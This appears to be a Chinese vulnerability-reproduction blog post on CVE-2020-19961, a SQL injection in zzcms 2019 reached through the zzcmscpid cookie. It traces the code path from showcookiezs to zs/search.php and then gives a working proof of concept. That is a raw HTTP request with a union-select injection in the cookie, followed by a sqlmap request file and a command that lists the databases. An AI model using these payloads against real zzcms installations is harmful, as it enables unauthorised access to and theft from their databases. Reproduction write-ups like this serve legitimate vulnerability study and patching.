CVE-2020-19961(zzcms存在sql注入漏洞)

漏洞空间 2024-01-23 CMS漏洞, 渗透技巧, 漏洞复现POC

zz cms 2019 subzs.php 存在sql注入漏洞

文件对应路径:

 zs/subzs.php

注入漏洞存在位置:


CVE-2020-19961(zzcms存在sql注入漏洞)

在showcookiezs函数中,第十六行sql语句将cookie中接收的zzcmscpid没闭合直接拼接

查找调用showcookiezs的函数,在fix函数中被调用,而且要当标签为cookiezs的时候才能执行,继续查找调用fix的函数

CVE-2020-19961(zzcms存在sql注入漏洞)

发现在label.php的第十二行的showlabel函数中调用

CVE-2020-19961(zzcms存在sql注入漏洞)

也就是要查找调用showlabel函数,而且传进去的$str 带有标签 cookiezs 的

CVE-2020-19961(zzcms存在sql注入漏洞)

查找发现有2个符合,分别是 zs/search.php 和 zs/zs_list.php

zs/search.php

$fp="../template/".$siteskin."/zs_search.htm";

$f = fopen($fp,'r');

$strout = fread($f,filesize($fp));

$strout=showlabel($strout);

echo $strout;

CVE-2020-19961(zzcms存在sql注入漏洞)

zs_list.php

$fp="../template/".$siteskin."/".$skin;

$f = fopen($fp,'r');

$strout = fread($f,filesize($fp));

$strout=showlabel($strout);

echo $strout;

CVE-2020-19961(zzcms存在sql注入漏洞)

构造的POC如下:

GET /zs/search.php HTTP/1.1
Host: eci-2ze2ipiauqlmkbuye5j3.cloudeci1.ichunqiu.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: keyword=1; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961,1686744961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1686744961; __51cke__=; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; PHPSESSID=nrehljkae20keni8guois7tvp7; tablename=zzcms_zxclass; __tins__713776=%7B%22sid%22%3A%201686745083272%2C%20%22vd%22%3A%2063%2C%20%22expires%22%3A%201686748313743%7D; __51laig__=63;zzcmscpid=1,1) union%0aselect%0auser(),1,version(;
Connection: close

使用sqlmap注入数据包如下:

GET /zs/search.php HTTP/1.1
Host: eci-2ze2ipiauqlmkbuye5j3.cloudeci1.ichunqiu.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: keyword=1; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961,1686744961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1686744961; __51cke__=; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; PHPSESSID=nrehljkae20keni8guois7tvp7; tablename=zzcms_zxclass; __tins__713776=%7B%22sid%22%3A%201686745083272%2C%20%22vd%22%3A%2063%2C%20%22expires%22%3A%201686748313743%7D; __51laig__=63;zzcmscpid=1
Connection: close

把poc代码保存为2.txt使用sqlmap注入语句如下:

sqlmap.py -r P:2.txt --cookie  "zzcmscpid" --level=2 --dbs

CVE-2020-19961(zzcms存在sql注入漏洞)

 

THE END
分享
二维码
海报
CVE-2020-19961(zzcms存在sql注入漏洞)
zz cms 2019 subzs.php 存在sql注入漏洞 文件对应路径:  zs/subzs.php 注入漏洞存在位置: 在showcookiezs函数中,第十六行sql语句将cookie中接收的zzcmscpid没闭合直接拼接 查找调用showcookiezs的函数,在fix函……
<<上一篇
下一篇>>